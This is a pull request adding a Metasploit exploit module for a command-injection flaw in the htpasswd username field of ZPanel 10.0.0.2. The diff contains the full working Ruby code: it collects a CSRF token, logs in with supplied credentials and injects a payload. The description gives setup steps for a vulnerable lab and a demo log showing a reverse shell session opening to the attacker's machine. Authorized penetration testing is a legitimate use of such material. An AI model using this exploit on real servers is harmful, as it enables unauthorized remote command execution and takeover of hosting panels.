### PR TITLE
Add OSVDB-94038: ZPanel htpasswd Module Username Command Execution

### DIFF
--- a/modules/exploits/unix/webapp/zpanel_username_exec.rb
+++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'unix',
 			'Targets'        =>
 				[
-					[ 'ZPanel 10.0.0.2 on Linux', {} ],
+					[ 'ZPanel 10.0.0.2 on Linux', {} ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Jun 7 2013",

--- a/modules/exploits/unix/webapp/zpanel_username_exec.rb
+++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb
@@ -1,0 +1,165 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "ZPanel 10.0.0.2 htpasswd Module Username Command Execution",
+			'Description'    => %q{
+				This module exploits a vulnerability found in ZPanel's htpasswd module. When
+				creating .htaccess using the htpasswd module, the username field can be used to
+				inject system commands, which is passed on to a system() function for executing
+				the system's htpasswd's command.
+
+				Please note: In order to use this module, you must have a valid account to login
+				to ZPanel.  An account part of any of the default groups should suffice, such as:
+				Administrators, Resellers, or Users (Clients).  By default, there's already a
+				'zadmin' user, but the password is randomly generated.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'shachibista',  # Original discovery
+					'sinn3r'        # Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '94038'],
+					['URL', 'https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906'],
+					['URL', 'http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2']
+				],
+			'Arch'           => ARCH_CMD,
+			'Platform'       => 'unix',
+			'Targets'        =>
+				[
+					[ 'ZPanel 10.0.0.2 on Linux', {} ],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jun 7 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The base path to ZPanel', '/']),
+				OptString.new('USERNAME', [true, 'The username to authenticate as']),
+				OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+			], self.class)
+	end
+
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+
+	def check
+		res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
+		if not res
+			print_error("#{peer} - Connection timed out")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if res.body =~ /This server is running: ZPanel/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+
+	def login(base, token, cookie)
+		res  = send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => normalize_uri(base, 'index.php'),
+			'cookie'    => cookie,
+			'vars_post' => {
+				'inUsername' => datastore['USERNAME'],
+				'inPassword' => datastore['PASSWORD'],
+				'sublogin2'  => 'LogIn',
+				'csfr_token' => token
+			}
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out")
+		elsif res.body =~ /Application Error/ or res.headers['location'].to_s =~ /invalidlogin/
+			fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
+		end
+
+		res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || ''
+	end
+
+
+	def get_csfr_info(base, path='index.php', cookie='', vars={})
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => normalize_uri(base),
+			'cookie'   => cookie,
+			'vars_get' => vars
+		})
+
+		fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res
+
+		token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || ''
+		sid   = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || ''
+		fail_with(Exploit::Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty?
+
+		return token, sid
+	end
+
+
+	def exec(base, token, sid, user_salt_cookie)
+		fake_pass = "BBBB"
+		cookie    = "#{sid}; #{user_salt_cookie}"
+		p = "echo test > /tmp/test3.txt"
+
+		send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => normalize_uri(base),
+			'cookie'   => cookie,
+			'vars_get' => {
+				'module' => 'htpasswd',
+				'action' => 'CreateHTA'
+			},
+			'vars_post' => {
+				'inAuthName'          => 'Restricted+Area',
+				'inHTUsername'        => ";#{payload.encoded} #",
+				'inHTPassword'        => fake_pass,
+				'inConfirmHTPassword' => fake_pass,
+				'inPath'              => '/',
+				'csfr_token'          => token
+			}
+		})
+	end
+
+
+	def exploit
+		base = target_uri.path
+
+		token, sid = get_csfr_info(base)
+		vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
+
+		user_salt_cookie = login(base, token, sid)
+		print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
+
+		vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'}
+		cookie = "#{sid}; #{user_salt_cookie}"
+		token = get_csfr_info(base, '', cookie, vars)[0]
+		vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
+
+
+		print_status("#{peer} - Executing payload...")
+		exec(base, token, sid, user_salt_cookie)
+	end
+
+end

--- a/modules/exploits/unix/webapp/zpanel_username_exec.rb
+++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb
@@ -119,9 +119,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exec(base, token, sid, user_salt_cookie)
-		fake_pass = "BBBB"
+		fake_pass = Rex::Text.rand_text_alpha(5)
 		cookie    = "#{sid}; #{user_salt_cookie}"
-		p = "echo test > /tmp/test3.txt"
 
 		send_request_cgi({
 			'method'   => 'POST',


### PR DESCRIPTION
This module exploits a vulnerability found in ZPanel's htpasswd module. When creating .htaccess using the htpasswd module, the username field can be used to inject system commands, which is passed on to a system() function for executing the system's htpasswd's command.

Please note:

In order to use this module, you must have a valid account to login to ZPanel.  An account part of any of the default groups should suffice, such as: Administrators, Resellers, or Users (Clients).  By default, there's already a 'zadmin' user, but the password is randomly generated.  You can find the password in /root/passwords.txt

Installation for Ubuntu 12:
1. You can download ZPanel by running this command:
   
   wget http://www.zvps.co.uk/sites/default/files/downloads/ubuntu-12-04/package/installer-x86-10-0-1.sh.x.tar.gz
2. Unzip the tarball, and chmod the installer:
   
   $ tar -xf installer-x86-10-0-1.sh.x.tar.gz
   $ chmod 777 installer-x86-10-0-1.sh.x
3. Just follow the steps of your installer.  Note: The installer might run an update to make sure ZPanel is up to date, this includes the patch for the vulnerability we're trying to hit.
4. Assuming the update ran, we'll have to checkout the vulnerable version.  Do this:
   
   $ cd /etc/zpanel
   $ mv panel original_panel   <--- this is how we save the original one, you'll need the config files
   $ git clone https://github.com/bobsta63/zpanelx.git panel
   $ chmod -R 777 panel
   $ cd panel
   $ git checkout fd02352a9e2b4837b93e679557db14f1af0d6ee2  <--- Before the patch
5. Restore the conf files in directory "original_panel" to the one in "panel".  And then your ZPanel should be functional again.

At least that's how I did it.

Demo:

```
[*] Started reverse double handler
[+] 10.0.1.80:80 - Logged in as 'client:abc123'
[*] 10.0.1.80:80 - Executing payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mrwUvpPvayfl8t23;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\nmrwUvpPvayfl8t23\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.1.76:4444 -> 10.0.1.80:36055) at 2013-06-21 21:12:41 -0500
```
